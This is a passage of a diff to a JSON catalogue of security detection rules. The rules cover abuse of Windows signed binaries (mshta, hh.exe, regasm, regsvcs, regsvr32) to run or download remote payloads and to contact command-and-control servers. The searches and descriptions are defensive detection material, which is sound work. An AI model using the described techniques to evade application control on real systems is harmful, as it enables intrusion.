- "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Exploitation" - ], - "message": "$process_name$ has been identified using Infotech Storage Handlers to load a specific file within a CHM on $dest$ under user $user$.", - "mitre_attack_id": [ - "T1218", - "T1218.001" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "dest", - "type": "Hostname", - "role": [ - "Victim" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] - } - ], - "risk_score": 72, - "security_domain": "endpoint", - "risk_severity": "medium", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1218", - "mitre_attack_technique": "System Binary Proxy Execution", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "Lazarus Group" - ] - }, - { - "mitre_attack_id": "T1218.001", - "mitre_attack_technique": "Compiled HTML File", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "APT38", - "APT41", - "Dark Caracal", - "OilRig", - "Silence" - ] - } - ] - } - }, - { - "name": "Detect mshta inline hta execution", - "description": "The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", - "search": "| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_inline_hta_execution_filter`", - "tags": { - "name": "Detect mshta inline hta execution", - "analytic_story": [ - "Suspicious MSHTA Activity", - "Living Off The Land" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Exploitation" - ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ executing with inline HTA, indicative of defense evasion.", - "mitre_attack_id": [ - "T1218", - "T1218.005" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "dest", - "type": "Hostname", - "role": [ - "Victim" - ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] - } - ], - "risk_score": 90, - "security_domain": "endpoint", - "risk_severity": "high", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1218", - "mitre_attack_technique": "System Binary Proxy Execution", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "Lazarus Group" - ] - }, - { - "mitre_attack_id": "T1218.005", - "mitre_attack_technique": "Mshta", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "APT29", - "APT32", - "Confucius", - "Earth Lusca", - "FIN7", - "Gamaredon Group", - "Inception", - "Kimsuky", - "Lazarus Group", - "LazyScripter", - "MuddyWater", - "Mustang Panda", - "SideCopy", - "Sidewinder", - "TA551" - ] - } - ] - } - }, - { - "name": "Detect mshta renamed", - "description": "The following analytic identifies renamed instances of mshta.exe executing. Mshta.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64. This analytic utilizes the internal name of the PE to identify if is the legitimate mshta binary. Further analysis should be performed to review the executed content and validation it is the real mshta.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=mshta.exe AND Processes.original_file_name=MSHTA.EXE by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_renamed_filter`", - "tags": { - "name": "Detect mshta renamed", - "analytic_story": [ - "Suspicious MSHTA Activity", - "Living Off The Land" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Exploitation" - ], - "message": "The following $process_name$ has been identified as renamed, spawning from $parent_process_name$.", - "mitre_attack_id": [ - "T1218", - "T1218.005" - ], - "nist": [ - "DE.AE" - ], - "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", - "type": "Hostname", - "role": [ - "Victim" - ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] - } - ], - "risk_score": 80, - "security_domain": "endpoint", - "risk_severity": "high", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1218", - "mitre_attack_technique": "System Binary Proxy Execution", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "Lazarus Group" - ] - }, - { - "mitre_attack_id": "T1218.005", - "mitre_attack_technique": "Mshta", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "APT29", - "APT32", - "Confucius", - "Earth Lusca", - "FIN7", - "Gamaredon Group", - "Inception", - "Kimsuky", - "Lazarus Group", - "LazyScripter", - "MuddyWater", - "Mustang Panda", - "SideCopy", - "Sidewinder", - "TA551" - ] - } - ] - } - }, - { - "name": "Detect MSHTA Url in Command Line", - "description": "This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", - "search": "| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process=\"*http://*\" OR Processes.process=\"*https://*\") by Processes.user Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_url_in_command_line_filter`", - "tags": { - "name": "Detect MSHTA Url in Command Line", - "analytic_story": [ - "Suspicious MSHTA Activity", - "Living Off The Land" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Exploitation" - ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $est$ by user $user$ attempting to access a remote destination to download an additional payload.", - "mitre_attack_id": [ - "T1218", - "T1218.005" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "dest", - "type": "Hostname", - "role": [ - "Victim" - ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] - } - ], - "risk_score": 80, + "risk_score": 90, "security_domain": "endpoint", "risk_severity": "high", "mitre_attack_enrichments": [ @@ -273182,40 +275587,30 @@ ] }, { - "mitre_attack_id": "T1218.005", - "mitre_attack_technique": "Mshta", + "mitre_attack_id": "T1218.001", + "mitre_attack_technique": "Compiled HTML File", "mitre_attack_tactics": [ "Defense Evasion" ], "mitre_attack_groups": [ - "APT29", - "APT32", - "Confucius", - "Earth Lusca", - "FIN7", - "Gamaredon Group", - "Inception", - "Kimsuky", - "Lazarus Group", - "LazyScripter", - "MuddyWater", - "Mustang Panda", - "SideCopy", - "Sidewinder", - "TA551" + "APT38", + "APT41", + "Dark Caracal", + "OilRig", + "Silence" ] } ] } }, { - "name": "Detect Regasm Spawning a Process", - "description": "The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regasm.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_spawning_a_process_filter`", + "name": "Detect HTML Help Using InfoTech Storage Handlers", + "description": "The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process IN (\"*its:*\", \"*mk:@MSITStore:*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_using_infotech_storage_handlers_filter`", "tags": { - "name": "Detect Regasm Spawning a Process", + "name": "Detect HTML Help Using InfoTech Storage Handlers", "analytic_story": [ - "Suspicious Regsvcs Regasm Activity", + "Suspicious Compiled HTML Activity", "Living Off The Land" ], "asset_type": "Endpoint", @@ -273225,10 +275620,10 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ spawning a child process, typically not normal behavior for $parent_process_name$.", + "message": "$process_name$ has been identified using Infotech Storage Handlers to load a specific file within a CHM on $dest$ under user $user$.", "mitre_attack_id": [ "T1218", - "T1218.009" + "T1218.001" ], "nist": [ "DE.CM" @@ -273248,13 +275643,6 @@ "Victim" ] }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, { "name": "process_name", "type": "Process", @@ -273263,7 +275651,7 @@ ] } ], - "risk_score": 64, + "risk_score": 72, "security_domain": "endpoint", "risk_severity": "medium", "mitre_attack_enrichments": [ @@ -273278,24 +275666,30 @@ ] }, { - "mitre_attack_id": "T1218.009", - "mitre_attack_technique": "Regsvcs/Regasm", + "mitre_attack_id": "T1218.001", + "mitre_attack_technique": "Compiled HTML File", "mitre_attack_tactics": [ "Defense Evasion" ], - "mitre_attack_groups": [] + "mitre_attack_groups": [ + "APT38", + "APT41", + "Dark Caracal", + "OilRig", + "Silence" + ] } ] } }, { - "name": "Detect Regasm with Network Connection", - "description": "The following analytic identifies regasm.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", - "search": "`sysmon` EventID=3 dest_ip!=10.0.0.0/12 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regasm.exe | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, user, process_name, src_ip, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_with_network_connection_filter`", + "name": "Detect mshta inline hta execution", + "description": "The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", + "search": "| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_inline_hta_execution_filter`", "tags": { - "name": "Detect Regasm with Network Connection", + "name": "Detect mshta inline hta execution", "analytic_story": [ - "Suspicious Regsvcs Regasm Activity", + "Suspicious MSHTA Activity", "Living Off The Land" ], "asset_type": "Endpoint", @@ -273305,10 +275699,10 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $process_name$ contacting a remote destination was identified on endpoint $Computer$ by user $user$. This behavior is not normal for $process_name$.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ executing with inline HTA, indicative of defense evasion.", "mitre_attack_id": [ "T1218", - "T1218.009" + "T1218.005" ], "nist": [ "DE.CM" @@ -273328,6 +275722,13 @@ "Victim" ] }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, { "name": "process_name", "type": "Process", @@ -273336,7 +275737,7 @@ ] } ], - "risk_score": 80, + "risk_score": 90, "security_domain": "endpoint", "risk_severity": "high", "mitre_attack_enrichments": [ @@ -273351,24 +275752,40 @@ ] }, { - "mitre_attack_id": "T1218.009", - "mitre_attack_technique": "Regsvcs/Regasm", + "mitre_attack_id": "T1218.005", + "mitre_attack_technique": "Mshta", "mitre_attack_tactics": [ "Defense Evasion" ], - "mitre_attack_groups": [] + "mitre_attack_groups": [ + "APT29", + "APT32", + "Confucius", + "Earth Lusca", + "FIN7", + "Gamaredon Group", + "Inception", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "MuddyWater", + "Mustang Panda", + "SideCopy", + "Sidewinder", + "TA551" + ] } ] } }, { - "name": "Detect Regasm with no Command Line Arguments", - "description": "The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in `C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe` and `C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe`.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regasm` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(regasm\\.exe.{0,4}$)\" | `detect_regasm_with_no_command_line_arguments_filter`", + "name": "Detect mshta renamed", + "description": "The following analytic identifies renamed instances of mshta.exe executing. Mshta.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64. This analytic utilizes the internal name of the PE to identify if is the legitimate mshta binary. Further analysis should be performed to review the executed content and validation it is the real mshta.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=mshta.exe AND Processes.original_file_name=MSHTA.EXE by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_renamed_filter`", "tags": { - "name": "Detect Regasm with no Command Line Arguments", + "name": "Detect mshta renamed", "analytic_story": [ - "Suspicious Regsvcs Regasm Activity", + "Suspicious MSHTA Activity", "Living Off The Land" ], "asset_type": "Endpoint", @@ -273378,13 +275795,13 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $dest$ by $user$.", + "message": "The following $process_name$ has been identified as renamed, spawning from $parent_process_name$.", "mitre_attack_id": [ "T1218", - "T1218.009" + "T1218.005" ], "nist": [ - "DE.CM" + "DE.AE" ], "observable": [ { @@ -273395,7 +275812,7 @@ ] }, { - "name": "dest", + "name": "Computer", "type": "Hostname", "role": [ "Victim" @@ -273416,9 +275833,9 @@ ] } ], - "risk_score": 49, + "risk_score": 80, "security_domain": "endpoint", - "risk_severity": "low", + "risk_severity": "high", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1218", @@ -273431,24 +275848,40 @@ ] }, { - "mitre_attack_id": "T1218.009", - "mitre_attack_technique": "Regsvcs/Regasm", + "mitre_attack_id": "T1218.005", + "mitre_attack_technique": "Mshta", "mitre_attack_tactics": [ "Defense Evasion" ], - "mitre_attack_groups": [] + "mitre_attack_groups": [ + "APT29", + "APT32", + "Confucius", + "Earth Lusca", + "FIN7", + "Gamaredon Group", + "Inception", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "MuddyWater", + "Mustang Panda", + "SideCopy", + "Sidewinder", + "TA551" + ] } ] } }, { - "name": "Detect Regsvcs Spawning a Process", - "description": "The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regsvcs.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_spawning_a_process_filter`", + "name": "Detect MSHTA Url in Command Line", + "description": "This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", + "search": "| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process=\"*http://*\" OR Processes.process=\"*https://*\") by Processes.user Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_url_in_command_line_filter`", "tags": { - "name": "Detect Regsvcs Spawning a Process", + "name": "Detect MSHTA Url in Command Line", "analytic_story": [ - "Suspicious Regsvcs Regasm Activity", + "Suspicious MSHTA Activity", "Living Off The Land" ], "asset_type": "Endpoint", @@ -273458,10 +275891,10 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ typically not normal for this process.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $est$ by user $user$ attempting to access a remote destination to download an additional payload.", "mitre_attack_id": [ "T1218", - "T1218.009" + "T1218.005" ], "nist": [ "DE.CM" @@ -273496,9 +275929,9 @@ ] } ], - "risk_score": 64, + "risk_score": 80, "security_domain": "endpoint", - "risk_severity": "medium", + "risk_severity": "high", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1218", @@ -273511,22 +275944,38 @@ ] }, { - "mitre_attack_id": "T1218.009", - "mitre_attack_technique": "Regsvcs/Regasm", + "mitre_attack_id": "T1218.005", + "mitre_attack_technique": "Mshta", "mitre_attack_tactics": [ "Defense Evasion" ], - "mitre_attack_groups": [] + "mitre_attack_groups": [ + "APT29", + "APT32", + "Confucius", + "Earth Lusca", + "FIN7", + "Gamaredon Group", + "Inception", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "MuddyWater", + "Mustang Panda", + "SideCopy", + "Sidewinder", + "TA551" + ] } ] } }, { - "name": "Detect Regsvcs with Network Connection", - "description": "The following analytic identifies Regsvcs.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", - "search": "`sysmon` EventID=3 dest_ip!=10.0.0.0/12 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regsvcs.exe | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, user, process_name, src_ip, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_with_network_connection_filter`", + "name": "Detect Regasm Spawning a Process", + "description": "The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regasm.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_spawning_a_process_filter`", "tags": { - "name": "Detect Regsvcs with Network Connection", + "name": "Detect Regasm Spawning a Process", "analytic_story": [ "Suspicious Regsvcs Regasm Activity", "Living Off The Land" @@ -273538,7 +275987,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $process_name$ contacting a remote destination was identified on endpoint $Computer$ by user $user$. This behavior is not normal for $process_name$.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ spawning a child process, typically not normal behavior for $parent_process_name$.", "mitre_attack_id": [ "T1218", "T1218.009" @@ -273561,6 +276010,13 @@ "Victim" ] }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, { "name": "process_name", "type": "Process", @@ -273569,9 +276025,9 @@ ] } ], - "risk_score": 80, - "security_domain": "Endpoint", - "risk_severity": "high", + "risk_score": 64, + "security_domain": "endpoint", + "risk_severity": "medium", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1218", @@ -273595,11 +276051,11 @@ } }, { - "name": "Detect Regsvcs with No Command Line Arguments", - "description": "The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regsvcs` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(regsvcs\\.exe.{0,4}$)\"| `detect_regsvcs_with_no_command_line_arguments_filter`", + "name": "Detect Regasm with Network Connection", + "description": "The following analytic identifies regasm.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe.", + "search": "`sysmon` EventID=3 dest_ip!=10.0.0.0/12 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regasm.exe | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, user, process_name, src_ip, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_with_network_connection_filter`", "tags": { - "name": "Detect Regsvcs with No Command Line Arguments", + "name": "Detect Regasm with Network Connection", "analytic_story": [ "Suspicious Regsvcs Regasm Activity", "Living Off The Land" @@ -273611,7 +276067,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $dest$ by $user$.", + "message": "An instance of $process_name$ contacting a remote destination was identified on endpoint $Computer$ by user $user$. This behavior is not normal for $process_name$.", "mitre_attack_id": [ "T1218", "T1218.009" @@ -273634,13 +276090,6 @@ "Victim" ] }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, { "name": "process_name", "type": "Process", @@ -273649,9 +276098,9 @@ ] } ], - "risk_score": 49, + "risk_score": 80, "security_domain": "endpoint", - "risk_severity": "low", + "risk_severity": "high", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1218", @@ -273675,17 +276124,14 @@ } }, { - "name": "Detect Regsvr32 Application Control Bypass", - "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a \"Squiblydoo\" attack. \\\nUpon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for \"scrobj.dll\", the \".dll\" is not required to load scrobj. \"scrobj.dll\" will be loaded by \"regsvr32.exe\" upon execution. ", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process=*scrobj* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_regsvr32_application_control_bypass_filter`", + "name": "Detect Regasm with no Command Line Arguments", + "description": "The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in `C:\\Windows\\Microsoft.NET\\Framework\\v*\\regasm|regsvcs.exe` and `C:\\Windows\\Microsoft.NET\\Framework64\\v*\\regasm|regsvcs.exe`.", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_regasm` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(regasm\\.exe.{0,4}$)\" | `detect_regasm_with_no_command_line_arguments_filter`", "tags": { - "name": "Detect Regsvr32 Application Control Bypass", + "name": "Detect Regasm with no Command Line Arguments", "analytic_story": [ - "Living Off The Land", - "Cobalt Strike", - "BlackByte Ransomware", - "Graceful Wipe Out Attack", - "Suspicious Regsvr32 Activity" + "Suspicious Regsvcs Regasm Activity", + "Living Off The Land" ], "asset_type": "Endpoint", "cis20": [ @@ -273694,10 +276140,10 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ in an attempt to bypass detection and preventative controls was identified on endpoint $dest$ by user $user$.", + "message": "The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $dest$ by $user$.", "mitre_attack_id": [ "T1218", - "T1218.010" + "T1218.009" ], "nist": [ "DE.CM" @@ -273732,9 +276178,9 @@ ] } ], - "risk_score": 80, + "risk_score": 49, "security_domain": "endpoint", - "risk_severity": "high", + "risk_severity": "low", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1218", @@ -273747,35 +276193,24 @@ ] }, { - "mitre_attack_id": "T1218.010", - "mitre_attack_technique": "Regsvr32", + "mitre_attack_id": "T1218.009", + "mitre_attack_technique": "Regsvcs/Regasm", "mitre_attack_tactics": [ "Defense Evasion" ], - "mitre_attack_groups": [ - 